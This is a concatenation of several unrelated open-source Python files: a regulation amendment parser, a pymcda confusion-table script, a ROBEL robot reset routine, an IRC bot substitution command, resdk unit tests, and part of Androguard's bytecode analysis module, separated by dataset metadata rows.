any(isinstance(t, tokens.Paragraph) for t in token.tokens)):
return tokenized
# copy
converted = list(tokenized)
verb_seen = False
for i in range(len(converted)):
token = converted[i]
if isinstance(token, tokens.Verb):
verb_seen = True
elif verb_seen and token.match(tokens.Context, certain=False):
converted[i] = tokens.Paragraph(token.label)
return converted
def is_designate_token(token):
""" This is a designate token """
return token.match(tokens.Verb, verb=tokens.Verb.DESIGNATE)
def contains_one_designate_token(tokenized):
""" Return True if the list of tokens contains only one designate token.
"""
designate_tokens = [t for t in tokenized if is_designate_token(t)]
return len(designate_tokens) == 1
def contains_one_tokenlist(tokenized):
""" Return True if the list of tokens contains only one TokenList """
tokens_lists = [t for t in tokenized if isinstance(t, tokens.TokenList)]
return len(tokens_lists) == 1
def contains_one_context(tokenized):
""" Returns True if the list of tokens contains only one Context. """
contexts = [t for t in tokenized if isinstance(t, tokens.Context)]
return len(contexts) == 1
def deal_with_subpart_adds(tokenized):
"""If we have a designate verb, and a token list, we're going to
change the context to a Paragraph. Because it's not a context, it's
part of the manipulation."""
# Ensure that we only have one of each: designate verb, a token list and
# a context
verb_exists = contains_one_designate_token(tokenized)
list_exists = contains_one_tokenlist(tokenized)
context_exists = contains_one_context(tokenized)
if verb_exists and list_exists and context_exists:
token_list = []
for token in tokenized:
if isinstance(token, tokens.Context):
token_list.append(tokens.Paragraph(token.label))
else:
token_list.append(token)
return token_list, True
else:
return tokenized, False
def separate_tokenlist(tokenized):
"""When we come across a token list, separate it out into individual
tokens"""
converted = []
for token in tokenized:
if isinstance(token, tokens.TokenList):
converted.extend(token.tokens)
else:
converted.append(token)
return converted
def compress(lhs_label, rhs_label):
"""Combine two labels where the rhs replaces the lhs. If the rhs is
empty, assume the lhs takes precedent."""
if not rhs_label:
return lhs_label
label = list(lhs_label)
label.extend([None]*len(rhs_label))
label = label[:len(rhs_label)]
for i in range(len(rhs_label)):
label[i] = rhs_label[i] or label[i]
return label
def compress_context_in_tokenlists(tokenized):
"""Use compress (above) on elements within a tokenlist."""
final = []
for token in tokenized:
if token.match(tokens.TokenList):
subtokens = []
label_so_far = []
for subtoken in token.tokens:
if hasattr(subtoken, 'label'):
label_so_far = compress(label_so_far, subtoken.label)
subtokens.append(subtoken.copy(label=label_so_far))
else:
subtokens.append(subtoken)
final.append(token.copy(tokens=subtokens))
else:
final.append(token)
return final
def compress_context(tokenized, initial_context):
"""Add context to each of the paragraphs (removing context)"""
# copy
context = list(initial_context)
converted = []
for token in tokenized:
if isinstance(token, tokens.Context):
# Interpretations of appendices
if (len(context) > 1 and len(token.label) > 1
and context[1] == 'Interpretations'
and (token.label[1] or '').startswith('Appendix')):
context = compress(
context,
[token.label[0], None, token.label[1]] + token.label[2:])
else:
context = compress(context, token.label)
continue
# Another corner case: a "paragraph" is indicates interp context
elif (
isinstance(token, tokens.Paragraph) and len(context) > 1
and len(token.label) > 3 and context[1] == 'Interpretations'
and token.label[1] != 'Interpretations'):
context = compress(
context,
[token.label[0], None, token.label[2], '(' + ')('.join(
p for p in token.label[3:] if p) + ')'])
continue
elif isinstance(token, tokens.Paragraph):
context = compress(context, token.label)
token.label = context
converted.append(token)
return converted, context
def get_destination(tokenized, reg_part):
""" In a designate scenario, get the destination label. """
paragraphs = [t for t in tokenized if isinstance(t, tokens.Paragraph)]
destination = paragraphs[0]
if destination.label[0] is None:
# Sometimes the destination label doesn't know the reg part.
destination.label[0] = reg_part
destination = destination.label_text()
return destination
def handle_subpart_amendment(tokenized):
""" Handle the situation where a new subpart is designated. """
verb = tokens.Verb.DESIGNATE
token_lists = [t for t in tokenized if isinstance(t, tokens.TokenList)]
# There's only one token list of paragraphs, sections to be designated
tokens_to_be_designated = token_lists[0]
labels_to_be_designated = [t.label_text() for t in tokens_to_be_designated]
reg_part = tokens_to_be_designated.tokens[0].label[0]
destination = get_destination(tokenized, reg_part)
return DesignateAmendment(verb, labels_to_be_designated, destination)
class Amendment(object):
""" An Amendment object contains all the information necessary for
an amendment. """
TITLE = '[title]'
TEXT = '[text]'
HEADING = '[heading]'
def remove_intro(self, l):
""" Remove the marker that indicates this is a change to introductory
text. """
l = l.replace(self.TITLE, '').replace(self.TEXT, '')
return l.replace(self.HEADING, '')
def fix_interp_format(self, components):
"""Convert between the interp format of amendments and the normal,
node label format"""
if ['Interpretations'] == components[1:2]:
if len(components) > 2:
new_style = [components[0],
components[2].replace('Appendix:', '')]
# Add paragraphs
if len(components) > 3:
paragraphs = [p.strip('()')
for p in components[3].split(')(')]
paragraphs = filter(bool, paragraphs)
new_style.extend(paragraphs)
new_style.append(Node.INTERP_MARK)
# Add any paragraphs of the comment
new_style.extend(components[4:])
return new_style
else:
return components[:1] + [Node.INTERP_MARK]
return components
def fix_appendix_format(self, components):
"""Convert between the appendix format of amendments and the normal,
node label format"""
return [c.replace('Appendix:', '') for c in components]
def fix_label(self, label):
""" The labels that come back from parsing the list of amendments
are not the same type we use in the rest of parsing. Convert between
the two here (removing question markers, converting to interp
format, etc.)"""
def wanted(l):
return l != '?' and 'Subpart' not in l
components = label.split('-')
components = [self.remove_intro(l) for l in components if wanted(l)]
components = self.fix_interp_format(components)
components = self.fix_appendix_format(components)
return components
def __init__(self, action, label, destination=None):
self.action = action
self.original_label = label
self.label = self.fix_label(self.original_label)
if destination and '-' in destination:
self.destination = self.fix_interp_format(destination.split('-'))
else:
self.destination = destination
if self.TITLE in self.original_label:
self.field = self.TITLE
elif self.TEXT in self.original_label:
self.field = self.TEXT
elif self.HEADING in self.original_label:
self.field = self.HEADING
else:
self.field = None
def label_id(self):
""" Return the label id (dash delimited) for this label. """
return '-'.join(self.label)
def __repr__(self):
if self.destination:
return '(%s, %s, %s)' % (self.action, self.label, self.destination)
else:
return '(%s, %s)' % (self.action, self.label)
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.__dict__ == other.__dict__)
def __ne__(self, other):
return not self.__eq__(other)
class DesignateAmendment(Amendment):
""" A designate Amendment manages it's information a little differently
than a normal Amendment. Namely, there's more handling around Subparts."""
def __init__(self, action, label_list, destination):
self.action = action
self.original_labels = label_list
self.labels = [self.fix_label(l) for l in self.original_labels]
self.original_destination = destination
if 'Subpart' in destination and ':' in destination:
reg_part, subpart = self.original_destination.split('-')
_, subpart_letter = destination.split(':')
self.destination = [reg_part, 'Subpart', subpart_letter]
elif '-' in destination:
self.destination = self.fix_interp_format(destination.split('-'))
else:
self.destination = destination
def __repr__(self):
return "(%s, %s, %s)" % (
repr(self.action), repr(self.labels), repr(self.destination))
def make_amendments(tokenized, subpart=False):
"""Convert a sequence of (normalized) tokens into a list of amendments"""
verb = None
amends = []
if subpart:
amends.append(handle_subpart_amendment(tokenized))
else:
for i in range(len(tokenized)):
token = tokenized[i]
if isinstance(token, tokens.Verb):
assert token.active
verb = token.verb
elif isinstance(token, tokens.Paragraph):
if verb == tokens.Verb.MOVE:
if isinstance(tokenized[i-1], tokens.Paragraph):
origin = tokenized[i-1].label_text()
destination = token.label_text()
amends.append(Amendment(verb, origin, destination))
elif verb:
amends.append(Amendment(verb, token.label_text()))
# Edits to intro text should always be PUTs
for amend in amends:
if (not isinstance(amend, DesignateAmendment)
and amend.field == "[text]"
and amend.action == tokens.Verb.POST):
amend.action = tokens.Verb.PUT
return amends
def new_subpart_added(amendment):
""" Return True if label indicates that a new subpart was added """
new_subpart = amendment.action == 'POST'
label = amendment.original_label
m = [t for t, _, _ in amdpar.subpart_label.scanString(label)]
return (len(m) > 0 and new_subpart)
| cc0-1.0 | 1,316,664,245,820,526,000 | 37.28343 | 79 | 0.605642 | false | 3.93707 | false | false | false |
oso/pymcda | apps/display-confusion-table.py | 1 | 6419 | #!/usr/bin/env python
import os, sys
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/../")
import bz2
from xml.etree import ElementTree
from pymcda.electre_tri import MRSort
from pymcda.uta import AVFSort
from pymcda.types import PerformanceTable
from pymcda.types import AlternativesAssignments
from pymcda.types import AlternativePerformances
from pymcda.utils import compute_ca
from pymcda.utils import compute_confusion_matrix
from pymcda.utils import print_confusion_matrix
from pymcda.utils import print_pt_and_assignments
from pymcda.ui.graphic import display_electre_tri_models
from test_utils import is_bz2_file
f = sys.argv[1]
if not os.path.isfile(f):
print("Invalid file %s" % f)
sys.exit(1)
if is_bz2_file(f) is True:
f = bz2.BZ2File(f)
tree = ElementTree.parse(f)
root = tree.getroot()
try:
pt_learning = PerformanceTable().from_xmcda(root, 'learning_set')
except:
pt_learning = None
try:
pt_test = PerformanceTable().from_xmcda(root, 'test_set')
except:
pt_test = None
aa_learning_m1, aa_learning_m2 = None, None
aa_test_m1, aa_test_m2 = None, None
if root.find("ElectreTri[@id='initial']") is not None:
m1 = MRSort().from_xmcda(root, 'initial')
if pt_learning is not None:
aa_learning_m1 = m1.pessimist(pt_learning)
if pt_test is not None:
aa_test_m1 = m1.pessimist(pt_test)
elif root.find("AVFSort[@id='initial']") is not None:
m1 = AVFSort().from_xmcda(root, 'initial')
if pt_learning is not None:
aa_learning_m1 = m1.get_assignments(pt_learning)
if pt_test is not None:
aa_test_m1 = m1.get_assignments(pt_test)
else:
if root.find("alternativesAffectations[@id='learning_set']") is not None:
aa_learning_m1 = AlternativesAssignments().from_xmcda(root,
'learning_set')
if root.find("alternativesAffectations[@id='test_set']") is not None:
aa_test_m1 = AlternativesAssignments().from_xmcda(root, 'test_set')
if root.find("ElectreTri[@id='learned']") is not None:
m2 = MRSort().from_xmcda(root, 'learned')
if pt_learning is not None:
aa_learning_m2 = m2.pessimist(pt_learning)
if pt_test is not None:
aa_test_m2 = m2.pessimist(pt_test)
elif root.find("AVFSort[@id='learned']") is not None:
m2 = AVFSort().from_xmcda(root, 'learned')
if pt_learning is not None:
aa_learning_m2 = m2.get_assignments(pt_learning)
aids = []
from pymcda.utils import print_pt_and_assignments
for aid in aa_learning_m2.keys():
if aa_learning_m2[aid].category_id != aa_learning_m1[aid].category_id:
aids.append(aid)
else:
aids.append(aid)
au = m2.global_utilities(pt_learning)
print_pt_and_assignments(aids, None, [aa_learning_m1, aa_learning_m2], pt_learning, au)
# for i in range(1, len(pt_learning) + 1):
# aid = "a%d" % i
# uti = m2.global_utility(pt_learning["a%d" % i])
# if aa_learning_m2[aid].category_id != aa_learning_m1[aid].category_id:
# print("%s %g %s %s" % (aid, uti.value, aa_learning_m2[aid].category_id, aa_learning_m1[aid].category_id))
# print_pt_and_assignments(anok, c, [aa_learning_m1, aa_learning_m2], pt_learning)
if pt_test is not None:
aa_test_m2 = m2.get_assignments(pt_test)
def compute_auc_histo(aa):
pass
if aa_learning_m1 is not None:
ca_learning = compute_ca(aa_learning_m1, aa_learning_m2)
auc_learning = m2.auc(aa_learning_m1, pt_learning)
print("Learning set")
print("============")
print("CA : %g" % ca_learning)
print("AUC: %g" % auc_learning)
print("Confusion table:")
matrix = compute_confusion_matrix(aa_learning_m1, aa_learning_m2,
m2.categories)
print_confusion_matrix(matrix, m2.categories)
aids = [a.id for a in aa_learning_m1 \
if aa_learning_m1[a.id].category_id != aa_learning_m2[a.id].category_id]
if len(aids) > 0:
print("List of alternatives wrongly assigned:")
print_pt_and_assignments(aids, None, [aa_learning_m1, aa_learning_m2],
pt_learning)
if aa_test_m1 is not None and len(aa_test_m1) > 0:
ca_test = compute_ca(aa_test_m1, aa_test_m2)
auc_test = m2.auc(aa_test_m1, pt_test)
print("\n\nTest set")
print("========")
print("CA : %g" % ca_test)
print("AUC: %g" % auc_test)
print("Confusion table:")
matrix = compute_confusion_matrix(aa_test_m1, aa_test_m2, m2.categories)
print_confusion_matrix(matrix, m2.categories)
aids = [a.id for a in aa_test_m1 \
if aa_test_m1[a.id].category_id != aa_test_m2[a.id].category_id]
if len(aids) > 0:
print("List of alternatives wrongly assigned:")
print_pt_and_assignments(aids, None, [aa_test_m1, aa_test_m2],
pt_test)
if type(m2) == MRSort:
worst = AlternativePerformances('worst', {c.id: 0 for c in m2.criteria})
best = AlternativePerformances('best', {c.id: 1 for c in m2.criteria})
categories = m2.categories
a_learning = aa_learning_m1.keys()
pt_learning_ok = []
pt_learning_too_low = []
pt_learning_too_high = []
for a in a_learning:
i1 = categories.index(aa_learning_m1[a].category_id)
i2 = categories.index(aa_learning_m2[a].category_id)
if i1 == i2:
pt_learning_ok.append(pt_learning[a])
elif i1 < i2:
pt_learning_too_high.append(pt_learning[a])
elif i1 > i2:
pt_learning_too_low.append(pt_learning[a])
a_test = aa_test_m1.keys()
pt_test_ok = []
pt_test_too_low = []
pt_test_too_high = []
for a in a_test:
i1 = categories.index(aa_test_m1[a].category_id)
i2 = categories.index(aa_test_m2[a].category_id)
if i1 == i2:
pt_test_ok.append(pt_test[a])
elif i1 < i2:
pt_test_too_high.append(pt_test[a])
elif i1 > i2:
pt_test_too_low.append(pt_test[a])
display_electre_tri_models([m2, m2], [worst, worst], [best, best],
[m2.vpt, m2.vpt],
[pt_learning_too_low, pt_test_too_low],
None,
[pt_learning_too_high, pt_test_too_high])
| gpl-3.0 | 691,970,308,955,988,100 | 36.538012 | 122 | 0.606481 | false | 2.947199 | true | false | false |
google-research/robel | robel/dkitty/utils/manual_reset.py | 1 | 3903 | # Copyright 2019 The ROBEL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Hardware reset functions for the D'Kitty."""
import time
from robel.components.builder import ComponentBuilder
from robel.components.robot import RobotComponentBuilder
from robel.components.robot.dynamixel_robot import DynamixelRobotComponent
from robel.components.tracking import TrackerComponentBuilder
from robel.components.tracking.tracker import TrackerComponent
from robel.utils.reset_procedure import ResetProcedure
class ManualAutoDKittyResetProcedure(ResetProcedure):
"""Manual reset procedure for D'Kitty.
This waits until the D'Kitty is placed upright and automatically starts the
episode.
"""
def __init__(self,
upright_threshold: float = 0.9,
max_height: float = 0.35,
min_successful_checks: int = 5,
check_interval_sec: float = 0.1,
print_interval_sec: float = 1.0,
episode_start_delay_sec: float = 1.0):
super().__init__()
self._upright_threshold = upright_threshold
self._max_height = max_height
self._min_successful_checks = min_successful_checks
self._check_interval_sec = check_interval_sec
self._print_interval_sec = print_interval_sec
self._episode_start_delay_sec = episode_start_delay_sec
self._last_print_time = 0
self._robot = None
self._tracker = None
def configure_reset_groups(self, builder: ComponentBuilder):
"""Configures the component groups needed for reset."""
if isinstance(builder, RobotComponentBuilder):
assert 'dkitty' in builder.group_configs
elif isinstance(builder, TrackerComponentBuilder):
assert 'torso' in builder.group_configs
def reset(self, robot: DynamixelRobotComponent, tracker: TrackerComponent):
"""Performs the reset procedure."""
self._robot = robot
self._tracker = tracker
def finish(self):
"""Called when the reset is complete."""
# Wait until the robot is sufficiently upright.
self._wait_until_upright()
def _wait_until_upright(self):
"""Waits until the D'Kitty is upright."""
upright_checks = 0
self._last_print_time = 0 # Start at 0 so print happens first time.
while True:
if self._is_dkitty_upright():
upright_checks += 1
else:
upright_checks = 0
if upright_checks > self._min_successful_checks:
break
time.sleep(self._check_interval_sec)
print('Reset complete, starting episode...')
time.sleep(self._episode_start_delay_sec)
def _is_dkitty_upright(self) -> bool:
"""Checks if the D'Kitty is currently upright."""
state = self._tracker.get_state('torso')
height = state.pos[2]
upright = state.rot[2, 2]
cur_time = time.time()
if cur_time - self._last_print_time >= self._print_interval_sec:
self._last_print_time = cur_time
print(('Waiting for D\'Kitty to be upright (upright: {:.2f}, '
'height: {:.2f})').format(upright, height))
if upright < self._upright_threshold:
return False
if height > self._max_height:
return False
return True
| apache-2.0 | 7,082,934,502,937,618,000 | 37.643564 | 79 | 0.643351 | false | 4.082636 | false | false | false |
Heufneutje/PyMoronBot | Commands/Sub.py | 1 | 7071 | # -*- coding: utf-8 -*-
"""
Created on Feb 28, 2015
@author: Tyranic-Moron
"""
import re
from IRCMessage import IRCMessage
from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
from twisted.words.protocols.irc import assembleFormattedText, attributes as A
class UnbalancedBracesException(Exception):
def __init__(self, message, column):
# Call the base exception constructor with the params it needs
super(UnbalancedBracesException, self).__init__(message)
# Store the column position of the unbalanced brace
self.column = column
class DictMergeError(Exception):
pass
class Sub(CommandInterface):
triggers = ['sub']
help = "sub <text> - executes nested commands in <text> and replaces the commands with their output\n" \
"syntax: text {command params} more text {command {command params} {command params}}\n" \
"example: .sub Some {rainbow magical} {flip topsy-turvy} text"
runInThread = True
def execute(self, message):
"""
@type message: IRCMessage
"""
subString = self._mangleEscapes(message.Parameters)
try:
segments = list(self._parseSubcommandTree(subString))
except UnbalancedBracesException as e:
red = assembleFormattedText(A.fg.lightRed[''])
normal = assembleFormattedText(A.normal[''])
error = subString[:e.column] + red + subString[e.column] + normal + subString[e.column+1:]
error = self._unmangleEscapes(error, False)
return [IRCResponse(ResponseType.Say, u"Sub Error: {}".format(e.message), message.ReplyTo),
IRCResponse(ResponseType.Say, error, message.ReplyTo)]
prevLevel = -1
responseStack = []
extraVars = {}
metadata = {}
for segment in segments:
(level, command, start, end) = segment
# We've finished executing subcommands at the previous depth,
# so replace subcommands with their output at the current depth
if level < prevLevel:
command = self._substituteResponses(command, responseStack, level, extraVars, start)
# Replace any extraVars in the command
for var, value in extraVars.iteritems():
command = re.sub(ur'\$\b{}\b'.format(re.escape(var)), u'{}'.format(value), command)
# Build a new message out of this segment
inputMessage = IRCMessage(message.Type, message.User.String, message.Channel,
self.bot.commandChar + command.lstrip(),
self.bot,
metadata=metadata)
# Execute the constructed message
if inputMessage.Command.lower() in self.bot.moduleHandler.mappedTriggers:
response = self.bot.moduleHandler.mappedTriggers[inputMessage.Command.lower()].execute(inputMessage)
"""@type : IRCResponse"""
else:
return IRCResponse(ResponseType.Say,
u"'{}' is not a recognized command trigger".format(inputMessage.Command),
message.ReplyTo)
# Push the response onto the stack
responseStack.append((level, response.Response, start, end))
# Update the extraVars dict
extraVars.update(response.ExtraVars)
metadata = self._recursiveMerge(metadata, response.Metadata)
prevLevel = level
responseString = self._substituteResponses(subString, responseStack, -1, extraVars, -1)
responseString = self._unmangleEscapes(responseString)
return IRCResponse(ResponseType.Say, responseString, message.ReplyTo, extraVars=extraVars, metadata=metadata)
@staticmethod
def _parseSubcommandTree(string):
"""Parse braced segments in string as tuples (level, contents, start index, end index)."""
stack = []
for i, c in enumerate(string):
if c == '{':
stack.append(i)
elif c == '}':
if stack:
start = stack.pop()
yield (len(stack), string[start + 1: i], start, i)
else:
raise UnbalancedBracesException(u"unbalanced closing brace", i)
if stack:
start = stack.pop()
raise UnbalancedBracesException(u"unbalanced opening brace", start)
@staticmethod
def _substituteResponses(command, responseStack, commandLevel, extraVars, start):
# Pop responses off the stack and replace the subcommand that generated them
while len(responseStack) > 0:
level, responseString, rStart, rEnd = responseStack.pop()
if level <= commandLevel:
responseStack.append((level, responseString, rStart, rEnd))
break
cStart = rStart - start - 1
cEnd = rEnd - start
# Replace the subcommand with its output
command = command[:cStart] + responseString + command[cEnd:]
# Replace any extraVars generated by functions
for var, value in extraVars.iteritems():
command = re.sub(ur'\$\b{}\b'.format(re.escape(var)), u'{}'.format(value), command)
return command
@staticmethod
def _mangleEscapes(string):
# Replace escaped left and right braces with something that should never show up in messages/responses
string = re.sub(ur'(?<!\\)\\\{', u'@LB@', string)
string = re.sub(ur'(?<!\\)\\\}', u'@RB@', string)
return string
@staticmethod
def _unmangleEscapes(string, unescape=True):
if unescape:
# Replace the mangled escaped braces with unescaped braces
string = string.replace(u'@LB@', u'{')
string = string.replace(u'@RB@', u'}')
else:
# Just unmangle them, ie, keep the escapes
string = string.replace(u'@LB@', u'\\{')
string = string.replace(u'@RB@', u'\\}')
return string
def _recursiveMerge(self, d1, d2):
from collections import MutableMapping
'''
Update two dicts of dicts recursively,
if either mapping has leaves that are non-dicts,
the second's leaf overwrites the first's.
'''
for k, v in d1.iteritems():
if k in d2:
if all(isinstance(e, MutableMapping) for e in (v, d2[k])):
d2[k] = self._recursiveMerge(v, d2[k])
# we could further check types and merge as appropriate here.
elif isinstance(v, list):
# merge/append lists
if isinstance(d2[k], list):
# merge lists
v.extend(d2[k])
else:
# append to list
v.append(d2[k])
d3 = d1.copy()
d3.update(d2)
return d3
| mit | -4,750,790,059,631,187,000 | 39.872832 | 117 | 0.583652 | false | 4.441583 | false | false | false |
genialis/resolwe-bio-py | tests/unit/test_users.py | 1 | 1420 | """
Unit tests for resdk/resources/user.py file.
"""
import unittest
from mock import MagicMock
from resdk.resources.user import Group, User
class TestGroup(unittest.TestCase):
def setUp(self):
self.resolwe = MagicMock()
self.user = User(resolwe=self.resolwe, id=42)
self.group = Group(resolwe=self.resolwe, name="Test group", id=1)
self.group_no_id = Group(resolwe=self.resolwe, name="Test group")
def test_users_no_id(self):
with self.assertRaises(ValueError):
self.group_no_id.users
def test_users(self):
self.resolwe.user.filter.return_value = [self.user]
users = self.group.users
self.assertEqual(len(users), 1)
self.assertEqual(users[0], self.user)
def test_add_user_no_id(self):
with self.assertRaises(ValueError):
self.group_no_id.add_users(self.user)
def test_add_user(self):
self.group.add_users(self.user)
self.resolwe.api.group().add_users.post.assert_called_with({"user_ids": [42]})
def test_remove_user_no_id(self):
with self.assertRaises(ValueError):
self.group_no_id.remove_users(self.user)
def test_remove_user(self):
self.group.remove_users(self.user)
self.resolwe.api.group().remove_users.post.assert_called_with(
{"user_ids": [42]}
)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 5,720,585,394,346,826,000 | 26.843137 | 86 | 0.630986 | false | 3.364929 | true | false | false |
palaniyappanBala/androguard | androguard/core/analysis/analysis.py | 10 | 70640 | # This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re, random, cPickle, collections
from androguard.core.androconf import error, warning, debug, is_ascii_problem,\
load_api_specific_resource_module
from androguard.core.bytecodes import dvm
from androguard.core.bytecodes.api_permissions import DVM_PERMISSIONS_BY_PERMISSION, DVM_PERMISSIONS_BY_ELEMENT
class ContextField(object):
def __init__(self, mode):
self.mode = mode
self.details = []
def set_details(self, details):
for i in details:
self.details.append( i )
class ContextMethod(object):
def __init__(self):
self.details = []
def set_details(self, details):
for i in details:
self.details.append( i )
class ExternalFM(object):
def __init__(self, class_name, name, descriptor):
self.class_name = class_name
self.name = name
self.descriptor = descriptor
def get_class_name(self):
return self.class_name
def get_name(self):
return self.name
def get_descriptor(self):
return self.descriptor
class ToString(object):
def __init__(self, tab):
self.__tab = tab
self.__re_tab = {}
for i in self.__tab:
self.__re_tab[i] = []
for j in self.__tab[i]:
self.__re_tab[i].append( re.compile( j ) )
self.__string = ""
def push(self, name):
for i in self.__tab:
for j in self.__re_tab[i]:
if j.match(name) != None:
if len(self.__string) > 0:
if i == 'O' and self.__string[-1] == 'O':
continue
self.__string += i
def get_string(self):
return self.__string
class BreakBlock(object):
def __init__(self, _vm, idx):
self._vm = _vm
self._start = idx
self._end = self._start
self._ins = []
self._ops = []
self._fields = {}
self._methods = {}
def get_ops(self):
return self._ops
def get_fields(self):
return self._fields
def get_methods(self):
return self._methods
def push(self, ins):
self._ins.append(ins)
self._end += ins.get_length()
def get_start(self):
return self._start
def get_end(self):
return self._end
def show(self):
for i in self._ins:
print "\t\t",
i.show(0)
DVM_FIELDS_ACCESS = {
"iget" : "R",
"iget-wide" : "R",
"iget-object" : "R",
"iget-boolean" : "R",
"iget-byte" : "R",
"iget-char" : "R",
"iget-short" : "R",
"iput" : "W",
"iput-wide" : "W",
"iput-object" : "W",
"iput-boolean" : "W",
"iput-byte" : "W",
"iput-char" : "W",
"iput-short" : "W",
"sget" : "R",
"sget-wide" : "R",
"sget-object" : "R",
"sget-boolean" : "R",
"sget-byte" : "R",
"sget-char" : "R",
"sget-short" : "R",
"sput" : "W",
"sput-wide" : "W",
"sput-object" : "W",
"sput-boolean" : "W",
"sput-byte" : "W",
"sput-char" : "W",
"sput-short" : "W",
}
class DVMBasicBlock(object):
"""
A simple basic block of a dalvik method
"""
def __init__(self, start, vm, method, context):
self.__vm = vm
self.method = method
self.context = context
self.last_length = 0
self.nb_instructions = 0
self.fathers = []
self.childs = []
self.start = start
self.end = self.start
self.special_ins = {}
self.name = "%s-BB@0x%x" % (self.method.get_name(), self.start)
self.exception_analysis = None
self.tainted_variables = self.context.get_tainted_variables()
self.tainted_packages = self.context.get_tainted_packages()
self.notes = []
def get_notes(self):
return self.notes
def set_notes(self, value):
self.notes = [value]
def add_note(self, note):
self.notes.append(note)
def clear_notes(self):
self.notes = []
def get_instructions(self):
"""
Get all instructions from a basic block.
:rtype: Return all instructions in the current basic block
"""
tmp_ins = []
idx = 0
for i in self.method.get_instructions():
if idx >= self.start and idx < self.end:
tmp_ins.append(i)
idx += i.get_length()
return tmp_ins
def get_nb_instructions(self):
return self.nb_instructions
def get_method(self):
return self.method
def get_name(self):
return "%s-BB@0x%x" % (self.method.get_name(), self.start)
def get_start(self):
return self.start
def get_end(self):
return self.end
def get_last(self):
return self.get_instructions()[-1]
def get_next(self):
"""
Get next basic blocks
:rtype: a list of the next basic blocks
"""
return self.childs
def get_prev(self):
"""
Get previous basic blocks
:rtype: a list of the previous basic blocks
"""
return self.fathers
def set_fathers(self, f):
self.fathers.append(f)
def get_last_length(self):
return self.last_length
def set_childs(self, values):
#print self, self.start, self.end, values
if values == []:
next_block = self.context.get_basic_block( self.end + 1 )
if next_block != None:
self.childs.append( ( self.end - self.get_last_length(), self.end, next_block ) )
else:
for i in values:
if i != -1:
next_block = self.context.get_basic_block( i )
if next_block != None:
self.childs.append( ( self.end - self.get_last_length(), i, next_block) )
for c in self.childs:
if c[2] != None:
c[2].set_fathers( ( c[1], c[0], self ) )
def push(self, i):
try:
self.nb_instructions += 1
idx = self.end
self.last_length = i.get_length()
self.end += self.last_length
op_value = i.get_op_value()
# field access
if (op_value >= 0x52 and op_value <= 0x6d):
desc = self.__vm.get_cm_field(i.get_ref_kind())
if self.tainted_variables != None:
self.tainted_variables.push_info(TAINTED_FIELD, desc, DVM_FIELDS_ACCESS[i.get_name()][0], idx, self.method)
# invoke
elif (op_value >= 0x6e and op_value <= 0x72) or (op_value >= 0x74 and op_value <= 0x78):
idx_meth = i.get_ref_kind()
method_info = self.__vm.get_cm_method(idx_meth)
if self.tainted_packages != None:
self.tainted_packages.push_info(method_info[0], TAINTED_PACKAGE_CALL, idx, self.method, idx_meth)
# new_instance
elif op_value == 0x22:
idx_type = i.get_ref_kind()
type_info = self.__vm.get_cm_type(idx_type)
if self.tainted_packages != None:
self.tainted_packages.push_info(type_info, TAINTED_PACKAGE_CREATE, idx, self.method, None)
# const-string
elif (op_value >= 0x1a and op_value <= 0x1b):
string_name = self.__vm.get_cm_string(i.get_ref_kind())
if self.tainted_variables != None:
self.tainted_variables.push_info(TAINTED_STRING, string_name, "R", idx, self.method)
elif op_value == 0x26 or (op_value >= 0x2b and op_value <= 0x2c):
code = self.method.get_code().get_bc()
self.special_ins[idx] = code.get_ins_off(idx + i.get_ref_off() * 2)
except:
pass
def get_special_ins(self, idx):
"""
Return the associated instruction to a specific instruction (for example a packed/sparse switch)
:param idx: the index of the instruction
:rtype: None or an Instruction
"""
try:
return self.special_ins[idx]
except:
return None
def get_exception_analysis(self):
return self.exception_analysis
def set_exception_analysis(self, exception_analysis):
self.exception_analysis = exception_analysis
TAINTED_LOCAL_VARIABLE = 0
TAINTED_FIELD = 1
TAINTED_STRING = 2
class PathVar(object):
def __init__(self, access, idx, dst_idx, info_obj):
self.access_flag = access
self.idx = idx
self.dst_idx = dst_idx
self.info_obj = info_obj
def get_var_info(self):
return self.info_obj.get_info()
def get_access_flag(self):
return self.access_flag
def get_src(self, cm):
method = cm.get_method_ref( self.idx )
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_dst(self, cm):
method = cm.get_method_ref( self.dst_idx )
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_idx(self):
return self.idx
class TaintedVariable(object):
def __init__(self, var, _type):
self.var = var
self.type = _type
self.paths = {}
self.__cache = []
def get_type(self):
return self.type
def get_info(self):
if self.type == TAINTED_FIELD:
return [ self.var[0], self.var[2], self.var[1] ]
return self.var
def push(self, access, idx, ref):
m_idx = ref.get_method_idx()
if m_idx not in self.paths:
self.paths[ m_idx ] = []
self.paths[ m_idx ].append( (access, idx) )
def get_paths_access(self, mode):
for i in self.paths:
for j in self.paths[ i ]:
for k, v in self.paths[ i ][ j ]:
if k in mode:
yield i, j, k, v
def get_paths(self):
if self.__cache != []:
return self.__cache
for i in self.paths:
for j in self.paths[ i ]:
self.__cache.append( [j, i] )
#yield j, i
return self.__cache
def get_paths_length(self):
return len(self.paths)
def show_paths(self, vm):
show_PathVariable( vm, self.get_paths() )
class TaintedVariables(object):
def __init__(self, _vm):
self.__vm = _vm
self.__vars = {
TAINTED_LOCAL_VARIABLE : {},
TAINTED_FIELD : {},
TAINTED_STRING : {},
}
self.__cache_field_by_method = {}
self.__cache_string_by_method = {}
self.AOSP_PERMISSIONS_MODULE = load_api_specific_resource_module("aosp_permissions", self.__vm.get_api_version())
